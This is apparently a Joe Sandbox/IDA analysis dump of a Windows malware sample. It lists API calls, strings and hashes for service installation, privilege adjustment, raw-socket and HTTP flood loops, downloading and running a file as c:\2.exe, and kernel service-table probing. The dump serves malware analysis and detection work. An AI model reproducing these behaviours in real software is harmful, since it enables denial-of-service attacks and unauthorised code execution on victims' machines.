      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValueVersion_strnicmp_ui64toawsprintf
      • String ID: %s SP%d$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$O5WGU2RYGMXDGMZSGIXG64THHI4DG===$ProcessorNameString$Win 2000$Win 2003$Win 95$Win 98$Win NT$Win Vista$Win XP
      • API String ID: 3322224748-824182824
      • Opcode ID: f6c0c16aefc7028bb481e130bd88835b7dfbc170d6bdc2f10909af5a7c339e0c
      • Instruction ID: 13d3b61b23b45e2e4c023b9cc0fc35249b46de21b34556b10f0f5e52fe902c2b
      • Opcode Fuzzy Hash: f6c0c16aefc7028bb481e130bd88835b7dfbc170d6bdc2f10909af5a7c339e0c
      • Instruction Fuzzy Hash: 108127316047044BD728CA24C904BABB3D6FBC4320F514A3EF95AE73D0DFB99D09868A
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004021AB
      • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004021DA
      • GetLastError.KERNEL32 ref: 004021E9
      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004021FD
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00402211
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0040221C
      • wsprintfA.USER32 ref: 00402233
      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 0040224C
      • lstrlen.KERNEL32(?), ref: 00402256
      • RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,?,00000000), ref: 0040226B
      Strings
      • Description, xrefs: 00402262
      • SYSTEM\CurrentControlSet\Services\%s, xrefs: 00402227
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Service$Open$Start$CreateErrorLastManagerValuelstrlenwsprintf
      • String ID: Description$SYSTEM\CurrentControlSet\Services\%s
      • API String ID: 1085164444-2908613140
      • Opcode ID: 154c3cc990fdae9aed9d98df527cbfc1d14e78514fef328f6b991c8467dc1853
      • Instruction ID: f4580113edc8e433eb06b14144884acc633483daa5052ba9940653bc4dc6f673
      • Opcode Fuzzy Hash: 154c3cc990fdae9aed9d98df527cbfc1d14e78514fef328f6b991c8467dc1853
      • Instruction Fuzzy Hash: 9C319971981224BBD720DF949E49F9F7B7CEB48B51F100169FA15B62C1C7B45910CBA8
      APIs
      • GetCurrentProcess.KERNEL32(00000028), ref: 004013A2
      • OpenProcessToken.ADVAPI32(00000000), ref: 004013A9
      • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004013C3
      • CloseHandle.KERNEL32(00000000), ref: 004013D2
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Process$CloseCurrentHandleLookupOpenPrivilegeTokenValue
      • String ID:
      • API String ID: 2654680240-0
      • Opcode ID: 8864c288b9cb71c30d5e91295d1a8abcd9c991bda94a8974c1128a605e635a0a
      • Instruction ID: cc2b99641f5a8469a3b4e8ed31b91ddc2a866a93870fc30e959dc988af51fc73
      • Opcode Fuzzy Hash: 8864c288b9cb71c30d5e91295d1a8abcd9c991bda94a8974c1128a605e635a0a
      • Instruction Fuzzy Hash: 61115EB4644301ABE700DF64CD49B6B77E8FF88700F80892CF989E6290E378D9048B67
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004022CA
      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004022E3
      • DeleteService.ADVAPI32(00000000), ref: 004022F6
      • CloseServiceHandle.ADVAPI32(00000000), ref: 004022FD
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00402300
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Service$CloseHandleOpen$DeleteManager
      • String ID:
      • API String ID: 204194956-0
      • Opcode ID: 116d1e0ec0a4b372d694c8a67d0e82791e6de5e32c851d8c30bee83f41f85077
      • Instruction ID: 9b0c48f28204a619d0ffdb4144fcbd549302fdad28ef3037a9a57e52c33c53b6
      • Opcode Fuzzy Hash: 116d1e0ec0a4b372d694c8a67d0e82791e6de5e32c851d8c30bee83f41f85077
      • Instruction Fuzzy Hash: 91E0D8362826227BE2129328AD88F7F762CEF85B91F010125FB0576288CE748C019679
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000040), ref: 0040103F
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystem
      • String ID: \svchost.exe
      • API String ID: 2188284642-2416354339
      • Opcode ID: 20f70d25f9676ffdcdf1ef635abbee3c6989bc9dfcb48b6a723411113e9e4b98
      • Instruction ID: 7b973d18f3f385e2b8da6ee8bdeae4eb795e5e4e7678e48289140b949f781a9d
      • Opcode Fuzzy Hash: 20f70d25f9676ffdcdf1ef635abbee3c6989bc9dfcb48b6a723411113e9e4b98
      • Instruction Fuzzy Hash: BB1106756016488FC718CF29D584E56BBE4FB04364F0142BEE91ADB7E2DA74D908C758
      APIs
      • DeviceIoControl.KERNEL32(?,0022E14B,?,00000004,?,00000004,?,00000000), ref: 004016A3
      • GetLastError.KERNEL32 ref: 004016AD
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: ControlDeviceErrorLast
      • String ID:
      • API String ID: 2645620995-0
      • Opcode ID: fe5585f4748b38fa9a506305bcd843cf95f0b09592f7f9aa14bd26abe84b249e
      • Instruction ID: 8bdfebe32dfe5ddeb58f347a55ad02e0e9a9a1e444e6547fa025e88e6347be7c
      • Opcode Fuzzy Hash: fe5585f4748b38fa9a506305bcd843cf95f0b09592f7f9aa14bd26abe84b249e
      • Instruction Fuzzy Hash: AAE04F703403027FEA10CFA0CC85F1733D8AB80B48F08893CB209E92D0E7B8D844C629
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 2ffa0374c3452c7b45537c3aac30dca2655e988646b1adc00c7e20327800d53c
      • Instruction ID: f8b4bcb92d8f4c944223f3c11e07fdf06c0dc5259006c63bd6e70ab53eee926f
      • Opcode Fuzzy Hash: 2ffa0374c3452c7b45537c3aac30dca2655e988646b1adc00c7e20327800d53c
      • Instruction Fuzzy Hash: CD91D86184E3C06FD71387708C659917FB4AE13214B1A81EBE4C0EF4E3D26C694AD72B
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: bc3bc76f23b8451945670fb8ba92aaa9b44c7c866afdecc5507a8941fd66445c
      • Instruction ID: fbe82208a77236332a1fdc5c7113bf994c8e3d1fb805a4b59f5b8a24247e462b
      • Opcode Fuzzy Hash: bc3bc76f23b8451945670fb8ba92aaa9b44c7c866afdecc5507a8941fd66445c
      • Instruction Fuzzy Hash: 46415470A082059FDB14DF69C490A6AB7B1BF84328B14C57EE86AAB3D5CB74F940CB45

      Control-flow Graph

      APIs
      • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 00403145
      • setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 0040317A
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Socketsetsockopt
      • String ID: %u.193.%d.%d$@$E$P
      • API String ID: 4073417641-4005098346
      • Opcode ID: 2106d30019bef2af147a48b56c11f1fe6b56fd7c12d80706179d367cc767660b
      • Instruction ID: 4f5575538a0cf794be7eb95a31b6b2e6ffef1db0ee0ea924ed66e0d3a4dc536f
      • Opcode Fuzzy Hash: 2106d30019bef2af147a48b56c11f1fe6b56fd7c12d80706179d367cc767660b
      • Instruction Fuzzy Hash: 7C81CE711083449AD710DF64DC41BABBBE5AFC8710F00492EF695A72D1DAB49A08CBAB

      Control-flow Graph

      APIs
      • GetModuleHandleA.KERNEL32(ntdll.dll,NtQuerySystemInformation), ref: 0040187B
      • GetProcAddress.KERNEL32(00000000), ref: 00401882
      • GlobalAlloc.KERNEL32(00000040,?), ref: 004018AC
      • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 004018E2
      • GetLastError.KERNEL32 ref: 004018F2
      • printf.MSVCRT ref: 004018FE
      • GlobalFree.KERNEL32(?), ref: 00401914
      • GetProcAddress.KERNEL32(00000000,KeServiceDescriptorTable), ref: 00401920
      • printf.MSVCRT ref: 0040192F
      • printf.MSVCRT ref: 00401A10
      Strings
      • Possibly KiServiceLimit==%08X, xrefs: 004019EE
      • 0x%x 0x%08X, xrefs: 004019CB
      • ntdll.dll, xrefs: 00401870
      • &KiServiceTable==%08XDumping 'old' ServiceTable:, xrefs: 00401972
      • Can't find KeServiceDescriptorTable, xrefs: 0040192A
      • NtQuerySystemInformation, xrefs: 0040186B
      • KeServiceDescriptorTable, xrefs: 0040191A
      • Failed to load! LastError=%i, xrefs: 004018F9
      • strange NtQuerySystemInformation()!, xrefs: 00401A0B
      • Can't find KiServiceTable..., xrefs: 00401952
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: printf$AddressGlobalProc$AllocErrorFreeHandleLastLibraryLoadModule
      • String ID: Possibly KiServiceLimit==%08X$&KiServiceTable==%08XDumping 'old' ServiceTable:$0x%x 0x%08X$Can't find KeServiceDescriptorTable$Can't find KiServiceTable...$Failed to load! LastError=%i$KeServiceDescriptorTable$NtQuerySystemInformation$ntdll.dll$strange NtQuerySystemInformation()!
      • API String ID: 3553604609-3775360644
      • Opcode ID: ffc0be60d97f5dfd46203039b4cda45ebaa35cf3948b1044d8cdf3999da371ef
      • Instruction ID: 5768c73fbee113661ea424cb43e8d9f95342857d559040dcccde774f527aca14
      • Opcode Fuzzy Hash: ffc0be60d97f5dfd46203039b4cda45ebaa35cf3948b1044d8cdf3999da371ef
      • Instruction Fuzzy Hash: 4E511371240305AFD700EF98DE85D6BB7A8FFC8710F00053EF946A6241E639E915CBAA

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 363 404090-4040e0 strstr 364 4040e2-4040f1 363->364 365 4040f8-404105 strstr 363->365 364->365 366 404107-404168 strcspn strncpy strcspn 365->366 367 40416a-40417b 365->367 366->367 368 4041a1-40420b htons call 4030e0 367->368 369 40417d-40419f 367->369 372 404211-404212 368->372 373 40432d-404338 368->373 369->368 374 404218-40423d wsprintfA 372->374 375 40424b-404294 wsprintfA socket connect 374->375 376 40423f-404249 374->376 377 404311-404318 375->377 378 404296-4042ce setsockopt * 2 375->378 376->375 377->374 380 40431e-40432a 377->380 379 4042d3-4042fb send Sleep 378->379 379->379 381 4042fd-40430d closesocket Sleep 379->381 381->377
      APIs
      Strings
      • http://, xrefs: 004040B9, 004040E2
      • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 0040426A
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleepsetsockoptstrcspnstrstrwsprintf$closesocketconnecthtonssendsocketstrncpy
      • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
      • API String ID: 1549958995-1933603558
      • Opcode ID: 3cb8afb7b00b8b5575cc27588711fb03344b411bc078fc065225c7a324a4b3a6
      • Instruction ID: c1fde26447f8656147e6786571948f54528d1b62fa49e0ea339f3debddb0944f
      • Opcode Fuzzy Hash: 3cb8afb7b00b8b5575cc27588711fb03344b411bc078fc065225c7a324a4b3a6
      • Instruction Fuzzy Hash: EB7105722043005BD714DB28DD41AAB77E5FBC8320F014A3EFA56A72D1DEB5DA09CB99
      APIs
      • strstr.MSVCRT ref: 00403E69
      • strstr.MSVCRT ref: 00403E8E
      • strcspn.MSVCRT ref: 00403EB0
      • strncpy.MSVCRT ref: 00403EB9
      • strcspn.MSVCRT ref: 00403EC5
      • htons.WS2_32 ref: 00403F52
      • wsprintfA.USER32 ref: 00403FAD
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403FE0
      • connect.WS2_32(00000000,?,00000010), ref: 00403FF0
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 0040400D
      • setsockopt.WS2_32(00000000,0000FFFF,00001001,00000001,00000004), ref: 00404021
      • send.WS2_32(00000000,?,?,00000000), ref: 00404045
      • Sleep.KERNEL32(00000001,?,00000000), ref: 0040404D
      • closesocket.WS2_32(00000000), ref: 00404053
      • Sleep.KERNEL32(?,?,00000000), ref: 00404060
      Strings
      • http://, xrefs: 00403E49, 00403E72
      • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 00403FA7
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleepsetsockoptstrcspnstrstr$closesocketconnecthtonssendsocketstrncpywsprintf
      • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
      • API String ID: 1044657935-1933603558
      • Opcode ID: e261bc258bb4aa3f5bf075d5690df4ef4feadbfeb7c1069f847f69e5be35e265
      • Instruction ID: 40c65565b0e2d1f7331450249f0e816538a445790bab8e04dbed30efe200627d
      • Opcode Fuzzy Hash: e261bc258bb4aa3f5bf075d5690df4ef4feadbfeb7c1069f847f69e5be35e265
      • Instruction Fuzzy Hash: 9D61F1722002055AD724DB34DD01BAB77D5FBC8720F004A3EFA56A72D1DEB99A09CB99
      APIs
      • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00401525
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 0040152E
      • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 0040153E
      • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 0040154A
      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00401586
      • strncpy.MSVCRT ref: 004015C9
      • CreateProcessA.KERNEL32 ref: 00401616
      • FreeLibrary.KERNEL32(00000000), ref: 00401623
      • FreeLibrary.KERNEL32(00000000), ref: 00401626
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc$??2@CreateProcessstrncpy
      • String ID: D$GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$c:\2.exe$urlmon.dll$wininet.dll
      • API String ID: 2866020857-3875728843
      • Opcode ID: a3c8b419824d17f18d93d8c10aa4d386693e4cce12cf5b51044eb903a2ca5a37
      • Instruction ID: 49b7f00dae4a20d8495a03893bbef6d5a58a1a79a5b00c23ef4317028092d931
      • Opcode Fuzzy Hash: a3c8b419824d17f18d93d8c10aa4d386693e4cce12cf5b51044eb903a2ca5a37
      • Instruction Fuzzy Hash: 9B31AD716443046BE310DB64DC05F6B7BE8EBC4750F14092DB645B72D0DBB5B90587A7
      APIs
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 004044AA
      • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 004044CA
      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 004044D6
      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 004044E0
      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 004044EC
      • Sleep.KERNEL32(?), ref: 004045AC
      • FreeLibrary.KERNEL32(00000000), ref: 004045C1
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressProc$Library$FreeLoadSleep
      • String ID: Cache-Control: no-cacheReferer: http://www.google.com$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$wininet.dll$xq1986
      • API String ID: 4229481857-500719541
      • Opcode ID: e6d9cc5cf04fc7fade2cad51484567136f0c308ff658559d516b8fec7f80a17b
      • Instruction ID: d5a40d365fb673e185f2af7b8665aa2ffbe594809abcd310f9e1eb4b217c21dd
      • Opcode Fuzzy Hash: e6d9cc5cf04fc7fade2cad51484567136f0c308ff658559d516b8fec7f80a17b
      • Instruction Fuzzy Hash: 083183716443056BD310DF659C45F6BBBE8EFC4B50F10093EB641B62C1EBB8ED048AA9
      APIs
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 0040144C
      • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0040146B
      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00401475
      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 0040147F
      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0040148B
      • FreeLibrary.KERNEL32(00000000), ref: 004014EE
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressProc$Library$FreeLoad
      • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$JiangMin$wininet.dll
      • API String ID: 2449869053-1511921226
      • Opcode ID: 4891e638b8cfb21faee35d62fad90b6ee993c7db421e5afe19ec04009f83034e
      • Instruction ID: 274010f9111dd31d1687fcd3f1f9594105fbacdfde1de4873f4c05de7ce26b98
      • Opcode Fuzzy Hash: 4891e638b8cfb21faee35d62fad90b6ee993c7db421e5afe19ec04009f83034e
      • Instruction Fuzzy Hash: C511B931A843057BD331ABA59C45F9B76DCDFC5B00F10093AB641B61D1E9BCE90586AA
      APIs
      • socket.WS2_32(00000002,00000002,00000011), ref: 0040385F
      • htons.WS2_32 ref: 0040388A
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • htons.WS2_32(00000305), ref: 004038A7
